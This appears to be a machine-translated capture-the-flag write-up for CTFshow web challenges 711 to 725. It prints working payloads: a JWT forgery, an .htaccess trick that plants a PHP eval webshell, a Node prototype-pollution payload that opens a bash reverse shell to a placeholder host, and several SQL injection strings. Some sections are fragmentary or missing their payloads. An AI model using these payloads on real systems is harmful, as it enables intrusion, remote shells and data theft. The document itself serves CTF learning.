Original title of CTFSHOW competition (web711-web725)

Because there are many topics, many places are relatively simple. I hope the masters will understand..


Scanning the directory found robots Txt, prompt static / secret key txt
Access to get a string ctfshow_love_you
Then enter the normal page, there is a login and registration, randomly register a user, and after logging in, it is found that there is a file upload point.
However, the file uploading php suffix is not parsed. It should not be written in php.
Take a look at the session. It should be jwt encrypted. That's easy to say. Forge an admin user, and the encrypted secret key should be the string just obtained.

After modifying the session, you can see a flag Jpg picture, flag is on the picture.


This question mainly examines Utilization of htaccess file
The general steps are as follows:
Delete index All files except PHP – "write file –" delete except index All files outside PHP
Although the content is filtered, we can bypass it by wrapping
For example, the following contents play the same role

php_value auto_append_file "/etc/passwd"
php_value auto_append_fil\
e "/etc/passwd"

But we don't have any shell files to include. We can use an index PHP a self - uploaded htaccess file. And index PHP is actually useless
So we can only focus on htaccess file.
We can write the shellcode we use In the htaccess file, in order not to affect the function of the file, it needs to be commented out with a pound sign. Then include itself, i.e

php_value auto_append_fil\
e ".htaccess"
#<?php eval($_POST[1]);?>

But in the end, we will fill in another string of \ nJust one chance, so another \ will do.

php_value auto_prepend_fil\
e ".htaccess"
#<?php eval($_POST[1]);?>\

url encoding

Then visit / index PHP can use a one sentence Trojan horse.
Note that this is one-time, so don't get first and then post. You need to directly post the value.
Of course, there are other ways Reference articles


A cryptography problem.... Let's see. Come on


Prototype chain pollution
The vulnerability point is the following place, which needs to add more than five

Specific analysis principle https://xz.aliyun.com/t/6113 as well as Official wp

        "constructor": {
            "prototype": {
            "outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"');var __tmp2"

Access / render after request to bounce.


Casually pass a name, then grab the package and find that a new html page is returned

This place should be the amount of blood and speed in battle.
We copy this code and modify the blood volume or speed locally. Then build it up and check the value of payload. After calculating the value of sha256, pass it to get the flag.

But the test found that the payload is different every time, and it is not successful every time, so it's good to try a few more times.
If the setting doesn't work, just use my one



Combine the wp found on the Internet with the group leader asked
Get the final payload

     curl --request POST \
     --url http://97020164-cc45-4c3c-9e71-c0de83ca2e07.challenge.ctf.show/convert/markdown \
     --header 'Content-Type: multipart/form-data' \
     --form files=@index.html \
     -o result.pdf

Including index The content in html is

<h1 id=demo>
  CTF is my life :D!
  var loc = window.location.pathname;
  document.getElementById("demo").innerHTML = loc.substring(0, loc.lastIndexOf('/'))
<iframe src="/gotenberg/flag"></iframe> 




Final payload


What's more troublesome is that it should be eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
This function can be truncated with 00.
Then this if (! StrCmp ($C [1], $d) & & $C [1]==$ d) Arrays can be used to bypass.


be similar to web10
But this question gives too few things, and the source code is not known. I still know the content roughly through the original question.....
And the original questions are uname and pwd
This question is given to user and pass
uname=1'||1 group by pass with rollup limit 1 offset 1#&pwd=




View the source code with hint

 <!-- CTFSHOW hint: 
      if (($row[pass]) && (!strcasecmp(md5($pass), $row[pass]))) {
              echo "<p>Logged in! ".$flag." </p>";

The md5 of the password we need to enter is the same as the md5 found in the database. You can directly forge an md5 by union select, and then pass a corresponding string.
For example, if we want to pass password=1, the md5 value of 1 will be followed by union select.

password=1&username=1' union select 'c4ca4238a0b923820dcc509a6f75849b'%23


 <!-- CTFSHOW hint: 
          foreach ($_GET as $key => $value)
            $$key = $$value;
          foreach ($_POST as $key => $value)
            $$key = $value;
          if ( $_POST["flag"] !== $flag )
          echo "This is your flag : ". $flag . "\n";

Check the source code, there is a hint that it is a variable override.


In that case


Finally, the flag is output through die($success)


The final constructed statement is similar to
select * from user where username='\' and password='||1#'
Equivalent to
select * from user where username='xxx'||1#'




update injection
for instance

So we can construct

table_name=user` set user=1 or updatexml(2,concat(0x7e,(database())),0)%23

Final payload

table_name=user` set user=1 or updatexml(2,concat(0x7e,(select group_concat(secret) from ctfshow_secret)),0)%23

table_name=user` set user=1 or updatexml(2,concat(0x7e,(select right(group_concat(secret),30) from ctfshow_secret)),0)%23

Splicing is a complete flag

Keywords: PHP security Web Security

Added by slyte33 on Sun, 27 Feb 2022 13:22:34 +0200